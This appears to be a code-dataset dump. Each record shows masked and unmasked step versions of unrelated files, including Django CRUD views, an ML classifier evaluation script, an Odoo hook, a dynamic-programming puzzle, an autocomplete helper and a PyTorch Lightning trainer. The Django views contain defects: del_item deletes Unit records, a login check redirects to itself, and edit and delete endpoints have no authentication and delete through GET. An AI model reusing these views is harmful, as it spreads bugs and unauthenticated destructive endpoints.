unit_info.save()\n return redirect('/item/unit/')\n\n\ndef del_unit(request):\n nid = request.GET.get('nid')\n unit_info = Unit.objects.filter(id=nid)\n unit_info.delete()\n return redirect('/item/unit/')\n",
"step-3": "<mask token>\n\n\ndef item(request):\n if not request.session.get('is_login', None):\n return redirect('/item/item')\n else:\n item_list = Item.objects.all()\n return render(request, 'item/item.html', locals())\n\n\n<mask token>\n\n\ndef edit_item(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n item_info = Item.objects.get(id=nid)\n unit_list = Unit.objects.all()\n return render(request, 'item/edit_item.html', locals())\n else:\n nid = request.GET.get('nid')\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n unit_info = Unit.objects.get(id=item_unit)\n item_info = Item.objects.get(id=nid)\n item_info.item_index = item_index\n item_info.item_chinese_name = item_chinese_name\n item_info.item_english_name = item_english_name\n item_info.item_method = item_method\n item_info.item_unit = unit_info\n item_info.is_calc = str_to_bool(is_calc)\n item_info.is_use = str_to_bool(is_use)\n item_info.save()\n return redirect('/item/item/')\n\n\n<mask token>\n\n\ndef unit(request):\n if not request.session.get('is_login', None):\n return redirect('/item/unit')\n else:\n unit_list = Unit.objects.all()\n return render(request, 'item/unit.html', locals())\n\n\ndef add_unit(request):\n if request.method == 'GET':\n last_unit_info = Unit.objects.last()\n return render(request, 'item/add_unit.html', locals())\n else:\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name)\n new_unit.save()\n return redirect('/item/unit/')\n\n\ndef edit_unit(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n unit_info = Unit.objects.get(id=nid)\n return render(request, 'item/edit_unit.html', locals())\n else:\n nid = request.GET.get('nid')\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n unit_info = Unit.objects.get(id=nid)\n unit_info.unit_index = unit_index\n unit_info.unit_name = unit_name\n unit_info.save()\n return redirect('/item/unit/')\n\n\ndef del_unit(request):\n nid = request.GET.get('nid')\n unit_info = Unit.objects.filter(id=nid)\n unit_info.delete()\n return redirect('/item/unit/')\n",
"step-4": "<mask token>\n\n\ndef str_to_bool(s):\n return True if s.lower() == 'true' else False\n\n\ndef item(request):\n if not request.session.get('is_login', None):\n return redirect('/item/item')\n else:\n item_list = Item.objects.all()\n return render(request, 'item/item.html', locals())\n\n\ndef add_item(request):\n if request.method == 'GET':\n last_item_info = Item.objects.last()\n unit_list = Unit.objects.all()\n return render(request, 'item/add_item.html', locals())\n else:\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n unit_info = Unit.objects.get(id=item_unit)\n new_item = Item(item_index=int(item_index), item_chinese_name=\n item_chinese_name, item_english_name=item_english_name,\n item_method=item_method, item_unit=unit_info, is_calc=\n str_to_bool(is_calc), is_use=str_to_bool(is_use))\n new_item.save()\n return redirect('/item/item/')\n\n\ndef edit_item(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n item_info = Item.objects.get(id=nid)\n unit_list = Unit.objects.all()\n return render(request, 'item/edit_item.html', locals())\n else:\n nid = request.GET.get('nid')\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n unit_info = Unit.objects.get(id=item_unit)\n item_info = Item.objects.get(id=nid)\n item_info.item_index = item_index\n item_info.item_chinese_name = item_chinese_name\n item_info.item_english_name = item_english_name\n item_info.item_method = item_method\n item_info.item_unit = unit_info\n item_info.is_calc = str_to_bool(is_calc)\n item_info.is_use = str_to_bool(is_use)\n item_info.save()\n return redirect('/item/item/')\n\n\n<mask token>\n\n\ndef unit(request):\n if not request.session.get('is_login', None):\n return redirect('/item/unit')\n else:\n unit_list = Unit.objects.all()\n return render(request, 'item/unit.html', locals())\n\n\ndef add_unit(request):\n if request.method == 'GET':\n last_unit_info = Unit.objects.last()\n return render(request, 'item/add_unit.html', locals())\n else:\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name)\n new_unit.save()\n return redirect('/item/unit/')\n\n\ndef edit_unit(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n unit_info = Unit.objects.get(id=nid)\n return render(request, 'item/edit_unit.html', locals())\n else:\n nid = request.GET.get('nid')\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n unit_info = Unit.objects.get(id=nid)\n unit_info.unit_index = unit_index\n unit_info.unit_name = unit_name\n unit_info.save()\n return redirect('/item/unit/')\n\n\ndef del_unit(request):\n nid = request.GET.get('nid')\n unit_info = Unit.objects.filter(id=nid)\n unit_info.delete()\n return redirect('/item/unit/')\n",
"step-5": "from django.shortcuts import render, redirect\n\n\n# Create your views here.\nfrom item.models import Item, Unit\n\n\ndef str_to_bool(s):\n return True if s.lower() == 'true' else False\n\n\ndef item(request):\n if not request.session.get('is_login', None):\n return redirect('/item/item')\n else:\n item_list = Item.objects.all()\n return render(request, 'item/item.html', locals())\n\n\ndef add_item(request):\n if request.method == 'GET':\n last_item_info = Item.objects.last()\n unit_list=Unit.objects.all()\n return render(request, 'item/add_item.html', locals())\n else:\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n\n unit_info=Unit.objects.get(id=item_unit)\n new_item = Item(item_index=int(item_index), item_chinese_name=item_chinese_name,\n item_english_name=item_english_name,item_method=item_method,item_unit=unit_info,is_calc=str_to_bool(is_calc),\n is_use=str_to_bool(is_use))\n new_item.save()\n return redirect('/item/item/')\n\n\ndef edit_item(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n item_info = Item.objects.get(id=nid)\n unit_list = Unit.objects.all()\n return render(request, 'item/edit_item.html', locals())\n else:\n nid = request.GET.get('nid')\n item_index = request.POST.get('item_index')\n item_chinese_name = request.POST.get('item_chinese_name')\n item_english_name = request.POST.get('item_english_name')\n item_method = request.POST.get('item_method')\n item_unit = request.POST.get('item_unit')\n is_calc = request.POST.get('is_calc')\n is_use = request.POST.get('is_use')\n\n unit_info = Unit.objects.get(id=item_unit)\n item_info = Item.objects.get(id=nid)\n item_info.item_index = item_index\n item_info.item_chinese_name = item_chinese_name\n item_info.item_english_name = item_english_name\n item_info.item_method = item_method\n item_info.item_unit = unit_info\n item_info.is_calc = str_to_bool(is_calc)\n\n item_info.is_use = str_to_bool(is_use)\n item_info.save()\n return redirect('/item/item/')\n\n\ndef del_item(request):\n nid = request.GET.get('nid')\n item_info = Unit.objects.filter(id=nid)\n item_info.delete()\n return redirect('/item/item/')\n\n\ndef unit(request):\n if not request.session.get('is_login', None):\n return redirect('/item/unit')\n else:\n unit_list = Unit.objects.all()\n return render(request, 'item/unit.html', locals())\n\n\ndef add_unit(request):\n if request.method == 'GET':\n last_unit_info = Unit.objects.last()\n return render(request, 'item/add_unit.html', locals())\n else:\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n new_unit = Unit(unit_index=int(unit_index), unit_name=unit_name,)\n new_unit.save()\n return redirect('/item/unit/')\n\n\ndef edit_unit(request):\n if request.method == 'GET':\n nid = request.GET.get('nid')\n unit_info = Unit.objects.get(id=nid)\n return render(request, 'item/edit_unit.html', locals())\n else:\n nid = request.GET.get('nid')\n unit_index = request.POST.get('unit_index')\n unit_name = request.POST.get('unit_name')\n\n unit_info = Unit.objects.get(id=nid)\n unit_info.unit_index = unit_index\n unit_info.unit_name = unit_name\n\n unit_info.save()\n return redirect('/item/unit/')\n\n\ndef del_unit(request):\n nid = request.GET.get('nid')\n unit_info = 
Unit.objects.filter(id=nid)\n unit_info.delete()\n return redirect('/item/unit/')",
"step-ids": [
4,
5,
6,
8,
11
]
}
|
[
4,
5,
6,
8,
11
] |
from __future__ import division # floating point division
import csv
import random
import math
import numpy as np
import dataloader as dtl
import classalgorithms as algs
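# Evaluate each classifier on the SUSY data across the parameter settings and
# runs below, then report the best parameters and average error per learner.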
def getaccuracy(ytest, predictions):
correct = 0
for i in range(len(ytest)):
if ytest[i] == predictions[i]:
correct += 1
return (correct/float(len(ytest))) * 100.0
def geterror(ytest, predictions):
return (100.0-getaccuracy(ytest, predictions))
if __name__ == '__main__':
trainsize = 1000
testsize = 5000
numruns = 1
classalgs = {'Random': algs.Classifier(),
#'Naive Bayes': algs.NaiveBayes({'notusecolumnones': True}),
#'Naive Bayes Ones': algs.NaiveBayes({'notusecolumnones': False}),
#'Linear Regression': algs.LinearRegressionClass(),
#'Logistic Regression': algs.LogitReg(),
#'L1 Logistic Regression': algs.LogitReg({'regularizer': 'l1'}),
#'L2 Logistic Regression': algs.LogitReg({'regularizer': 'l2'}),
'Logistic Alternative': algs.LogitRegAlternative(),
#'Neural Network': algs.NeuralNet({'epochs': 100,'alpha':.01})
}
numalgs = len(classalgs)
parameters = (
#Regularization Weight, neural network height?
{'regwgt': 0.0, 'nh': 4},
#{'regwgt': 0.01, 'nh': 8},
#{'regwgt': 0.05, 'nh': 16},
#{'regwgt': 0.1, 'nh': 32},
)
numparams = len(parameters)
errors = {}
for learnername in classalgs:
errors[learnername] = np.zeros((numparams,numruns))
for r in range(numruns):
print ""
print "**********//////////////########### Run Number : ",(r+1),"###########\\\\\\\\\\\\\\\\\\\\\\\\\\\\*********"
print ""
##
##Fetching Data; Put Condition Which DataSet To Run
##
trainset, testset = dtl.load_susy(trainsize,testsize)
#trainset, testset = dtl.load_susy_complete(trainsize,testsize)
print('Running on train={0} and test={1} samples for run {2}').format(trainset[0].shape[0], testset[0].shape[0],r)
for p in range(numparams):
print ""
print "********** Parameter : ",(p+1),"**********"
print ""
params = parameters[p]
for learnername, learner in classalgs.iteritems():
# Reset learner for new parameters
learner.reset(params)
print "\n"
print 'Running learner = ' + learnername + ' on parameters ' + str(learner.getparams())
print ""
# Train model
learner.learn(trainset[0], trainset[1])
# Test model
predictions = learner.predict(testset[0])
error = geterror(testset[1], predictions)
print 'Error for ' + learnername + ': ' + str(error)
errors[learnername][p,r] = error
print ""
print "Some More Information : "
print ""
for learnername, learner in classalgs.iteritems():
besterror = np.mean(errors[learnername][0,:])
bestparams = 0
for p in range(numparams):
aveerror = np.mean(errors[learnername][p,:])
if aveerror < besterror:
besterror = aveerror
bestparams = p
# Extract best parameters
learner.reset(parameters[bestparams])
print 'Best parameters for ' + learnername + ': ' + str(learner.getparams())
print 'Average error for ' + learnername + ': ' + str(besterror) + ' +- ' + str(1.96*np.std(errors[learnername][bestparams,:])/math.sqrt(numruns))
|
normal
|
{
"blob_id": "c8ab53c77ff3646a30ca49eaafc275afeadd2ca6",
"index": 9545,
"step-1": "from __future__ import division # floating point division\nimport csv\nimport random\nimport math\nimport numpy as np\n\nimport dataloader as dtl\nimport classalgorithms as algs\n \n \ndef getaccuracy(ytest, predictions):\n correct = 0\n for i in range(len(ytest)):\n if ytest[i] == predictions[i]:\n correct += 1\n return (correct/float(len(ytest))) * 100.0\n\ndef geterror(ytest, predictions):\n return (100.0-getaccuracy(ytest, predictions))\n\n \nif __name__ == '__main__':\n trainsize = 1000\n testsize = 5000\n numruns = 1\n\n classalgs = {'Random': algs.Classifier(),\n #'Naive Bayes': algs.NaiveBayes({'notusecolumnones': True}),\n #'Naive Bayes Ones': algs.NaiveBayes({'notusecolumnones': False}),\n #'Linear Regression': algs.LinearRegressionClass(),\n #'Logistic Regression': algs.LogitReg(),\n #'L1 Logistic Regression': algs.LogitReg({'regularizer': 'l1'}),\n #'L2 Logistic Regression': algs.LogitReg({'regularizer': 'l2'}),\n 'Logistic Alternative': algs.LogitRegAlternative(), \n #'Neural Network': algs.NeuralNet({'epochs': 100,'alpha':.01})\n } \n numalgs = len(classalgs) \n\n parameters = (\n #Regularization Weight, neural network height?\n {'regwgt': 0.0, 'nh': 4},\n #{'regwgt': 0.01, 'nh': 8},\n #{'regwgt': 0.05, 'nh': 16},\n #{'regwgt': 0.1, 'nh': 32},\n )\n numparams = len(parameters) \n errors = {}\n for learnername in classalgs:\n errors[learnername] = np.zeros((numparams,numruns))\n \n for r in range(numruns):\n print \"\"\n print \"**********//////////////########### Run Number : \",(r+1),\"###########\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\*********\"\n print \"\"\n ##\n ##Fetching Data; Put Condition Which DataSet To Run\n ##\n trainset, testset = dtl.load_susy(trainsize,testsize)\n #trainset, testset = dtl.load_susy_complete(trainsize,testsize)\n\n print('Running on train={0} and test={1} samples for run {2}').format(trainset[0].shape[0], testset[0].shape[0],r)\n\n for p in range(numparams):\n print \"\"\n print \"********** Parameter : \",(p+1),\"**********\"\n print \"\"\n params = parameters[p]\n for learnername, learner in classalgs.iteritems():\n # Reset learner for new parameters\n learner.reset(params)\n print \"\\n\"\n print 'Running learner = ' + learnername + ' on parameters ' + str(learner.getparams())\n print \"\"\n # Train model\n learner.learn(trainset[0], trainset[1])\n # Test model\n predictions = learner.predict(testset[0])\n error = geterror(testset[1], predictions)\n print 'Error for ' + learnername + ': ' + str(error)\n errors[learnername][p,r] = error\n\n\n\n print \"\"\n print \"Some More Information : \"\n print \"\"\n for learnername, learner in classalgs.iteritems():\n besterror = np.mean(errors[learnername][0,:])\n bestparams = 0\n for p in range(numparams):\n aveerror = np.mean(errors[learnername][p,:])\n if aveerror < besterror:\n besterror = aveerror\n bestparams = p\n\n # Extract best parameters \n learner.reset(parameters[bestparams])\n \tprint 'Best parameters for ' + learnername + ': ' + str(learner.getparams())\n \tprint 'Average error for ' + learnername + ': ' + str(besterror) + ' +- ' + str(1.96*np.std(errors[learnername][bestparams,:])/math.sqrt(numruns))\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
/Users/apple/anaconda/lib/python3.5/operator.py
|
normal
|
{
"blob_id": "b4a267873c5823ecfa62a5e90b67c37f9cca3cd2",
"index": 8181,
"step-1": "/Users/apple/anaconda/lib/python3.5/operator.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
# -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr
from . import models
from . import wizards
from odoo import api, SUPERUSER_ID
from odoo.addons.account.models.chart_template import preserve_existing_tags_on_taxes
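# Typically wired as a post-init hook in the module manifest (not shown here):
# keeps existing tax tags, removes accounts 5301/5121/999999 and makes account
# 53000001 the Cash journal's default debit/credit account.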
def _preserve_tag_on_taxes(cr, registry):
preserve_existing_tags_on_taxes(cr, registry, 'l10n_lb')
env = api.Environment(cr, SUPERUSER_ID, {})
accounts = env['account.account'].search([('code', 'in', ['5301','5121','999999'])])
accounts.unlink()
journal_id = env['account.journal'].search([('name', '=', 'Cash'),('type', '=', 'cash')],limit=1)
if journal_id:
account = env['account.account'].search([('code', '=', '53000001')],limit=1)
journal_id.write({
'default_debit_account_id': account.id,
'default_credit_account_id': account.id
})
|
normal
|
{
"blob_id": "74b38599dd793282612a468a760f6301b9f039d6",
"index": 9878,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef _preserve_tag_on_taxes(cr, registry):\n preserve_existing_tags_on_taxes(cr, registry, 'l10n_lb')\n env = api.Environment(cr, SUPERUSER_ID, {})\n accounts = env['account.account'].search([('code', 'in', ['5301',\n '5121', '999999'])])\n accounts.unlink()\n journal_id = env['account.journal'].search([('name', '=', 'Cash'), (\n 'type', '=', 'cash')], limit=1)\n if journal_id:\n account = env['account.account'].search([('code', '=', '53000001')],\n limit=1)\n journal_id.write({'default_debit_account_id': account.id,\n 'default_credit_account_id': account.id})\n",
"step-3": "from . import models\nfrom . import wizards\nfrom odoo import api, SUPERUSER_ID\nfrom odoo.addons.account.models.chart_template import preserve_existing_tags_on_taxes\n\n\ndef _preserve_tag_on_taxes(cr, registry):\n preserve_existing_tags_on_taxes(cr, registry, 'l10n_lb')\n env = api.Environment(cr, SUPERUSER_ID, {})\n accounts = env['account.account'].search([('code', 'in', ['5301',\n '5121', '999999'])])\n accounts.unlink()\n journal_id = env['account.journal'].search([('name', '=', 'Cash'), (\n 'type', '=', 'cash')], limit=1)\n if journal_id:\n account = env['account.account'].search([('code', '=', '53000001')],\n limit=1)\n journal_id.write({'default_debit_account_id': account.id,\n 'default_credit_account_id': account.id})\n",
"step-4": "# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\n# Copyright (c) 2008 JAILLET Simon - CrysaLEAD - www.crysalead.fr\n\nfrom . import models\nfrom . import wizards\nfrom odoo import api, SUPERUSER_ID\nfrom odoo.addons.account.models.chart_template import preserve_existing_tags_on_taxes\n\ndef _preserve_tag_on_taxes(cr, registry):\n preserve_existing_tags_on_taxes(cr, registry, 'l10n_lb')\n env = api.Environment(cr, SUPERUSER_ID, {})\n accounts = env['account.account'].search([('code', 'in', ['5301','5121','999999'])])\n accounts.unlink()\n\n journal_id = env['account.journal'].search([('name', '=', 'Cash'),('type', '=', 'cash')],limit=1)\n if journal_id:\n account = env['account.account'].search([('code', '=', '53000001')],limit=1)\n journal_id.write({\n 'default_debit_account_id': account.id,\n 'default_credit_account_id': account.id\n })\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
def summation(numbers):
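    # Replace each negative input with twice its absolute value, scale every
    # value by the maximum, and print the sum of the scaled values.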
positive_numbers = []
normalized_numbers = []
numbers_list = numbers.split()
for idx, arg in enumerate(numbers_list):
int_arg = int(arg)
if int_arg < 0:
new_arg = abs(int_arg) * 2
else:
new_arg = int_arg
positive_numbers.append(new_arg)
max_of_positive_numbers = max(positive_numbers)
for idx, arg in enumerate(positive_numbers):
normalized_arg = arg / max_of_positive_numbers
normalized_numbers.append(normalized_arg)
print(sum(normalized_numbers))
|
normal
|
{
"blob_id": "791df87235f5da634fc62ebc3a3741cea6e2deca",
"index": 3841,
"step-1": "<mask token>\n",
"step-2": "def summation(numbers):\n positive_numbers = []\n normalized_numbers = []\n numbers_list = numbers.split()\n for idx, arg in enumerate(numbers_list):\n int_arg = int(arg)\n if int_arg < 0:\n new_arg = abs(int_arg) * 2\n else:\n new_arg = int_arg\n positive_numbers.append(new_arg)\n max_of_positive_numbers = max(positive_numbers)\n for idx, arg in enumerate(positive_numbers):\n normalized_arg = arg / max_of_positive_numbers\n normalized_numbers.append(normalized_arg)\n print(sum(normalized_numbers))\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
n, x0, y0 = list(map(int, input().split()))
cards = [y0] + list(map(int, input().split()))
# y's held card takes part in the game, so prepend it to the cards list
xs = [[-1] * (n+1) for i in range(n+1)]
ys = [[-1] * (n+1) for i in range(n+1)]
#xs[i][j] = best score when it is x's turn, x holds cards[i] and y holds cards[j] (i<j)
#ys[i][j] = best score when it is y's turn, x holds cards[j] and y holds cards[i] (i<j)
for i in range(n+1):
xs[i][-1] = abs(cards[-1] - cards[i])
ys[i][-1] = abs(cards[-1] - cards[i])
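# Fill the tables from the last card backwards: on x's turn take the maximum
# over y's possible replies, on y's turn the minimum over x's.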
for j in range(n-1, -1, -1):
# x[i][j] = max (y[j][j+1] , y[j][j+2] , ……, y[j][n] )
xs_temp = max(ys[j][j+1:n+1])
ys_temp = min(xs[j][j+1:n+1])
for i in range(0, j):
xs[i][j] = xs_temp
ys[i][j] = ys_temp
# print(xs)
# print(ys)
print(max(ys[0][1:]))
|
normal
|
{
"blob_id": "81b9fc78d92fdc4392cb71a77fdfd354ff950ae3",
"index": 6153,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(n + 1):\n xs[i][-1] = abs(cards[-1] - cards[i])\n ys[i][-1] = abs(cards[-1] - cards[i])\nfor j in range(n - 1, -1, -1):\n xs_temp = max(ys[j][j + 1:n + 1])\n ys_temp = min(xs[j][j + 1:n + 1])\n for i in range(0, j):\n xs[i][j] = xs_temp\n ys[i][j] = ys_temp\nprint(max(ys[0][1:]))\n",
"step-3": "n, x0, y0 = list(map(int, input().split()))\ncards = [y0] + list(map(int, input().split()))\nxs = [([-1] * (n + 1)) for i in range(n + 1)]\nys = [([-1] * (n + 1)) for i in range(n + 1)]\nfor i in range(n + 1):\n xs[i][-1] = abs(cards[-1] - cards[i])\n ys[i][-1] = abs(cards[-1] - cards[i])\nfor j in range(n - 1, -1, -1):\n xs_temp = max(ys[j][j + 1:n + 1])\n ys_temp = min(xs[j][j + 1:n + 1])\n for i in range(0, j):\n xs[i][j] = xs_temp\n ys[i][j] = ys_temp\nprint(max(ys[0][1:]))\n",
"step-4": "n, x0, y0 = list(map(int, input().split()))\n\ncards = [y0] + list(map(int, input().split()))\n# yの手持ちはゲームに関与するため、リストに加えてしまう\n\nxs = [[-1] * (n+1) for i in range(n+1)]\nys = [[-1] * (n+1) for i in range(n+1)] \n#xs[i][j] = xの手番で、xがcards[i]を持ちyがcards[j]を持っているとき(i<j)の最善スコア\n#ys[i][j] = yの手番で、xがcards[j]を持ちyがcards[i]を持っているとき(i<j)の最善スコア\n\nfor i in range(n+1):\n\txs[i][-1] = abs(cards[-1] - cards[i])\n\tys[i][-1] = abs(cards[-1] - cards[i])\n\nfor j in range(n-1, -1, -1):\n\n\t# x[i][j] = max (y[j][j+1] , y[j][j+2] , ……, y[j][n] )\n\txs_temp = max(ys[j][j+1:n+1])\n\tys_temp = min(xs[j][j+1:n+1])\n\tfor i in range(0, j):\n\t\txs[i][j] = xs_temp\n\t\tys[i][j] = ys_temp\n\n# print(xs)\n# print(ys)\nprint(max(ys[0][1:]))\t\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import heapq
from util import edit_distance
def autocomplete(suggest_tree, bktree, prefix, count=5):
"""Suggest top completions for a prefix given a SuggestTree and BKTree.
Completions for a given prefix are weighted primarily by their weight in the
suggest tree, and secondarily by their Levenshtein distance to words in the
BK-tree (where nearby words are weighted higher)."""
completion_weights = suggest_tree.completion_weights(prefix)
if completion_weights:
weight = lambda completion: completion_weights[completion]
proximity = lambda completion: completion_proximity_score(
prefix, completion)
selection_criteria = lambda completion: (
weight(completion), proximity(completion))
completions = completion_weights.keys()
return heapq.nlargest(count, completions, key=selection_criteria)
else:
matches = bktree.search(prefix)
proximity = lambda completion: edit_distance(prefix, completion)
return heapq.nsmallest(count, matches, key=proximity)
def completion_proximity_score(prefix, completion):
"""Calculate a score based on suffix length where a shorter length always
yields a higher score."""
if prefix == completion:
return float("inf")
else:
return 1.0 / float(len(completion))
|
normal
|
{
"blob_id": "24891cdefcd061f04e7b7768b1bde4e32b78adcc",
"index": 8690,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef completion_proximity_score(prefix, completion):\n \"\"\"Calculate a score based on suffix length where a shorter length always\n yields a higher score.\"\"\"\n if prefix == completion:\n return float('inf')\n else:\n return 1.0 / float(len(completion))\n",
"step-3": "<mask token>\n\n\ndef autocomplete(suggest_tree, bktree, prefix, count=5):\n \"\"\"Suggest top completions for a prefix given a SuggestTree and BKTree.\n \n Completions for a given prefix are weighted primarily by their weight in the \n suggest tree, and secondarily by their Levenshtein distance to words in the\n BK-tree (where nearby words are weighted higher).\"\"\"\n completion_weights = suggest_tree.completion_weights(prefix)\n if completion_weights:\n weight = lambda completion: completion_weights[completion]\n proximity = lambda completion: completion_proximity_score(prefix,\n completion)\n selection_criteria = lambda completion: (weight(completion),\n proximity(completion))\n completions = completion_weights.keys()\n return heapq.nlargest(count, completions, key=selection_criteria)\n else:\n matches = bktree.search(prefix)\n proximity = lambda completion: edit_distance(prefix, completion)\n return heapq.nsmallest(count, matches, key=proximity)\n\n\ndef completion_proximity_score(prefix, completion):\n \"\"\"Calculate a score based on suffix length where a shorter length always\n yields a higher score.\"\"\"\n if prefix == completion:\n return float('inf')\n else:\n return 1.0 / float(len(completion))\n",
"step-4": "import heapq\nfrom util import edit_distance\n\n\ndef autocomplete(suggest_tree, bktree, prefix, count=5):\n \"\"\"Suggest top completions for a prefix given a SuggestTree and BKTree.\n \n Completions for a given prefix are weighted primarily by their weight in the \n suggest tree, and secondarily by their Levenshtein distance to words in the\n BK-tree (where nearby words are weighted higher).\"\"\"\n completion_weights = suggest_tree.completion_weights(prefix)\n if completion_weights:\n weight = lambda completion: completion_weights[completion]\n proximity = lambda completion: completion_proximity_score(prefix,\n completion)\n selection_criteria = lambda completion: (weight(completion),\n proximity(completion))\n completions = completion_weights.keys()\n return heapq.nlargest(count, completions, key=selection_criteria)\n else:\n matches = bktree.search(prefix)\n proximity = lambda completion: edit_distance(prefix, completion)\n return heapq.nsmallest(count, matches, key=proximity)\n\n\ndef completion_proximity_score(prefix, completion):\n \"\"\"Calculate a score based on suffix length where a shorter length always\n yields a higher score.\"\"\"\n if prefix == completion:\n return float('inf')\n else:\n return 1.0 / float(len(completion))\n",
"step-5": "import heapq\nfrom util import edit_distance\n\n\ndef autocomplete(suggest_tree, bktree, prefix, count=5):\n \"\"\"Suggest top completions for a prefix given a SuggestTree and BKTree.\n \n Completions for a given prefix are weighted primarily by their weight in the \n suggest tree, and secondarily by their Levenshtein distance to words in the\n BK-tree (where nearby words are weighted higher).\"\"\"\n completion_weights = suggest_tree.completion_weights(prefix)\n if completion_weights:\n weight = lambda completion: completion_weights[completion]\n proximity = lambda completion: completion_proximity_score(\n prefix, completion)\n selection_criteria = lambda completion: (\n weight(completion), proximity(completion))\n completions = completion_weights.keys()\n return heapq.nlargest(count, completions, key=selection_criteria)\n else:\n matches = bktree.search(prefix)\n proximity = lambda completion: edit_distance(prefix, completion)\n return heapq.nsmallest(count, matches, key=proximity)\n\n \ndef completion_proximity_score(prefix, completion):\n \"\"\"Calculate a score based on suffix length where a shorter length always\n yields a higher score.\"\"\"\n if prefix == completion:\n return float(\"inf\")\n else:\n return 1.0 / float(len(completion))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# %%
import os
print(os.getcwd())
# %%
from TransformerModel.Model import Model
from dataset.DatasetLoader import DatasetLoader
import pytorch_lightning as pl
from pytorch_lightning.callbacks import EarlyStopping
import argparse
from argparse import ArgumentParser, ArgumentTypeError
# %%
def run_training(arguments_parser):
data = DatasetLoader(arguments_parser)
data.setup()
arguments_parser.num_training_steps = (
len(data.train_dataloader()) * arguments_parser.max_epochs
)
dict_args = vars(arguments_parser)
model = Model(**dict_args)
arguments_parser.early_stop_callback = EarlyStopping("val_loss")
trainer = pl.Trainer.from_argparse_args(arguments_parser)
trainer.fit(model, data)
# %%
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument("--pretrained", type=str, default="bert-base-uncased")
parser.add_argument("--nr_frozen_epochs", type=int, default=5)
parser.add_argument("--training_portion", type=float, default=0.9)
parser.add_argument("--batch_size", type=float, default=32)
parser.add_argument("--learning_rate", type=float, default=2e-5)
parser.add_argument("--frac", type=float, default=1)
parser = pl.Trainer.add_argparse_args(parser)
args = parser.parse_args()
run_training(args)
# %%
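# Illustration only (not part of the original script): assuming this file is saved
# as train.py, one possible launch from a shell would be
#
#   python train.py --pretrained bert-base-uncased --batch_size 32 \
#       --learning_rate 2e-5 --max_epochs 5
#
# where --max_epochs is one of the Trainer flags exposed by
# pl.Trainer.add_argparse_args and the rest are the custom arguments defined above.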
|
normal
|
{
"blob_id": "328a03acab2a0550bea0795d22110a152db6c503",
"index": 806,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef run_training(arguments_parser):\n data = DatasetLoader(arguments_parser)\n data.setup()\n arguments_parser.num_training_steps = len(data.train_dataloader()\n ) * arguments_parser.max_epochs\n dict_args = vars(arguments_parser)\n model = Model(**dict_args)\n arguments_parser.early_stop_callback = EarlyStopping('val_loss')\n trainer = pl.Trainer.from_argparse_args(arguments_parser)\n trainer.fit(model, data)\n\n\n<mask token>\n",
"step-3": "<mask token>\nprint(os.getcwd())\n<mask token>\n\n\ndef run_training(arguments_parser):\n data = DatasetLoader(arguments_parser)\n data.setup()\n arguments_parser.num_training_steps = len(data.train_dataloader()\n ) * arguments_parser.max_epochs\n dict_args = vars(arguments_parser)\n model = Model(**dict_args)\n arguments_parser.early_stop_callback = EarlyStopping('val_loss')\n trainer = pl.Trainer.from_argparse_args(arguments_parser)\n trainer.fit(model, data)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--pretrained', type=str, default='bert-base-uncased')\n parser.add_argument('--nr_frozen_epochs', type=int, default=5)\n parser.add_argument('--training_portion', type=float, default=0.9)\n parser.add_argument('--batch_size', type=float, default=32)\n parser.add_argument('--learning_rate', type=float, default=2e-05)\n parser.add_argument('--frac', type=float, default=1)\n parser = pl.Trainer.add_argparse_args(parser)\n args = parser.parse_args()\n run_training(args)\n",
